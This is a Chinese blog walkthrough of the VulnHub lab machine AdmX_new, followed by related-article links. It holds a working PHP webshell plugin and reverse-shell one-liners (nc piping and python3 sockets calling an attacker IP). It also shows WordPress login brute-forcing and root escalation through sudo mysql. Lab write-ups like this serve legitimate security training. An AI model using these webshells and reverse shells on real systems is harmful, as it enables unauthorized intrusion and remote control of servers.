vulnhub靶机--AdmX_new

最新推荐文章于 2023-07-29 13:15:00 发布
最新推荐文章于 2023-07-29 13:15:00 发布
阅读量3.9k 收藏
点赞数 2
分类专栏: vulnhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46107179/article/details/123995140
版权

靶机下载地址:靶机下载

主机发现

通过nmap扫描得到主机IP地址
在这里插入图片描述

信息搜集

通过nmap对IP地址扫描,得到信息,只有80端口
在这里插入图片描述
然后通过浏览器访问,发现只有Ubuntu的默认页面,于是利用feroxbuster -u http://192.168.137.145:80 扫描目录,发现是WordPress框架,但有很多重定向的url
在这里插入图片描述
于是用burpsuite来抓取一下这个数据包来分析,发现这写重定向都是定向到另外一个ip
在这里插入图片描述
需要通过burpsuite里面的proxy模块的options功能,将其响应头和响应体的ip替换
在这里插入图片描述
然后重新访问,就可以正常浏览了
在这里插入图片描述
然后访问WordPress管理员页面,/wordpress/wp-admin,这里需要账号密码登录,尝试一下弱密码,不行,提示我们密码不正确,说明账号为admin
在这里插入图片描述

漏洞利用

密码采用burp爆破,爆破出密码为adam14,然后登陆进入后台,一般的WordPress获取shell有三种方式
第一种是通过Media上传shell文件,但需要特定的漏洞版本才行;
第二种是修改主题,嵌入代码,一般在404.php文件中添加shell代码,但是这里不能更新
在这里插入图片描述
第三种是通过添加自己写的插件上传

<?php
/*
Plugin Name: Webshell
Plugin URI: https://github.com/171/
Description: Wordpress Webshell for Pentest
Version: 1.0
Author: 123
Author URI: https://github.com/171/
License: https://github.com/171/
*/
if(isset($_GET['cmd']))
	{
  	system($_GET['cmd']);
	}
?>

由于上传需要zip压缩包,所以需要将1.php压缩为1.zip再上传,上传成功后需要激活
在这里插入图片描述
然后访问http://192.168.137.145/wordpress/wp-content/plugins/1.php?cmd=id,发现可以得到了id:www-data
在这里插入图片描述
接下来查看本地的环境,有nc,python3,php,尝试反弹shell,这里可以用nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321 //在攻击主机上打开两个终端,分别监听 1234 和 4321 端口,得到反弹shell后,1234 终端 输入命令, 4321 终端就会获得执行相应命令后的结果,
和python反弹,因为只有python3环境,需要使用python3

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.152",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在这里插入图片描述
用/etc/passwd查看一下有哪些用户,发现有wpadmin,然后切换到home目录下查看用户里面的内容,发现没有权限
在这里插入图片描述

权限提升

接着尝试通过利用登录的密码切换账户,居然成功了
在这里插入图片描述
查看local.txt,应该是第一个flag,还需要获取root权限,通过sudo -l发现该用户执行数据库时不需要密码,就能得到root权限
在这里插入图片描述
但是数据库密码还需要获取,因为WordPress的目录下有个config.php,所以数据库密码应该在那个文件里面,返回刚才得到的路径查看数据库密码 Wp_Admin#123
在这里插入图片描述
登录mysql之后,里面有个system指令可以执行命令
在这里插入图片描述
执行system bash,查看proof.txt得到flag
在这里插入图片描述

成功反弹获取shell之后切换交互式shell

通过反弹得到shell,但并不是交互式shell,可以通过下面方式升级Full TTY Shell,此升级方案只适用于bash.因为这里我使用的是kali linux 要把把zsh切换为bash.
首先使用echo $SHELL查看当前shell的类型,接着使用chsh -s /bin/bash进行更改,更改后需要进行重启,重启弘我们再看shell类型发现已经是bash了
继续通过之前python反弹的shell,进行如下操作
1.输入Ctrl+Z
2.输入stty raw -echo
3.输入fg
4.输入export SHELL=/bin/bash
5.输入export TERM=screen
6.输入stty rows 38 columns 126
7.输入reset
通过以上操作后命令可以进行自动补全等功能

Ability~
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶场】ICA: 1 通关writeup
weixin_44588899的博客
05-22 1010
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.132 信息搜集 nmap -T4 -p- -A 192.168.220.132 发现开放22、80、3306端口,先打开80端口,发现cms是qdPM9.2版本,在exp-db搜索漏.
vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 & smb & 端口敲门 & RIPS & tomcat & linux 提权)
冬萍子癸水
04-25 1182
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap PORT STATE SERVICE REASON VERSION 22/tcp filtered ssh port-unreach...
靶机渗透练习89-IA:Nemesis (1.0.1)
hirak0的博客
05-01 3368
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-nemesis-101,582/ Description Difficulty: Intermediate to Hard Goal: Get the root shell and read all the 3 flags. Information: You need some good encryption and programming skills to root this box. Please solve t
kali之vulnhub,hardsocnet2
weixin_54431413的博客
05-15 996
一、利用最近公布的ubuntu 8.4 内核提权漏洞来进行了提取,简便的得到了服务器root权限。 二、利用缓冲区溢出来执行admin留下的backdoor来获得root权限,涉及gdb调试,汇编语言等
vulnhub chronos
weixin_46107179的博客
04-06 4384
靶机下载地址 主机发现 二层扫描:arp-scan -l 或则 netdiscover -r 10.0.2.0/24,扫描得到主机的IP地址10.0.2.6 信息搜集 通过nmap信息搜集主机信息,得到主机开放了22,80,8000端口,并且用的web服务是通过node.js的Express framework写的,以及中间件是Apache等信息 然后用浏览器打开这两个端口,发现这两个页面其实是一个页面,知识80端口那个页面是8000端口加了css样式的,然后尝试扫描隐藏目录,并没有什么发现;但是在查
VulnHub | Red:1
薛定的餓貓
12-19 2908
Red : 1 目录Red : 1项目地址测试环境测试过程信息收集查找后门文件后门利用hash碰撞会话维持权限提出 项目地址 http://www.vulnhub.com/entry/red-1,753/ 难度:Medium 测试环境 攻击机:Kali 192.168.56.109 目标靶机:Ubuntu 192.168.56.113 测试过程 信息收集 查找靶机IParp-scan -I eth1 -l,获取到目标IP为192.168.56.113。 使用nmap扫描目标开放了哪些端口nmap -sS
靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权
YouthBelief的博客
02-16 2744
靶机练习 No.24 Vulnhub靶机hackableII0x00 环境安装0x01 信息收集步骤一:ip探测步骤二:端口服务识别0x02 漏洞挖掘思路一:ftp 匿名访问思路二:80 http服务挖掘思路三:ssh爆破步骤一:ftp匿名访问(成功)(1) 匿名登录(2)查看内容步骤二:80http探测(1)访问首页(2)查看源码 有没有隐藏信息(3)目录扫描(4)查看files页面步骤三:ftp上传马(1)查看ftp是否拥有写权限(2)上传 kali自带的php反弹shell的马(3)kali开启监听,
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
靶机练习】Vulnhub靶场Earth-练习记录
weixin_36591264的博客
02-17 2298
注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开 信息收集 攻击机IP:192.168.43.118 主机发现: sudo nmap -sP 192.168.43.1/24 确认目标机IP:192.168.43.241 端口扫描: sudo nmap -sC -sV -p- 192.168.43.241 扫描结果: 目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。 没修改hosts之前访问http://192.168.43.241时返回Bad Req
vulnhub-Tre-Tre1-wp
yutianovo的博客
09-01 396
靶机描述 Machine Name: Tre Author: SunCSR Team Difficulty: Intermediate Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) DHCP: Enabled Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3153
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3188
Vulnhub-Zico2靶机实战
VulnHub-MOMENTUM: 1靶机
NeverForgetCX的博客
03-03 4583
前言: 在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。 攻击机kali:192.168.2.87 靶机IP:192.168.2.92 信息收集: 扫描靶机ip; arp-scan -l 得到靶机ip; 扫描靶机开放的端口;看见开放了22,80端口。 访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 1835
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
VulnHub——CH4INRULZ
江左盟的博客
04-13 1118
简介 这是VulnHub中非常简单的一个靶机,通过本地文件包含漏洞结合上传绕过漏洞获得Web服务权限,最后通过内核漏洞提升权限获得root权限。 信息收集 使用fping 192.168.204.0/24 -agq探测局域网内其他主机,发现存在一个132主机,如图: 然后使用nmap 192.168.204.132 --max-rate 1000 -A扫描常用端口及服务,发现开启21,...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ability~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值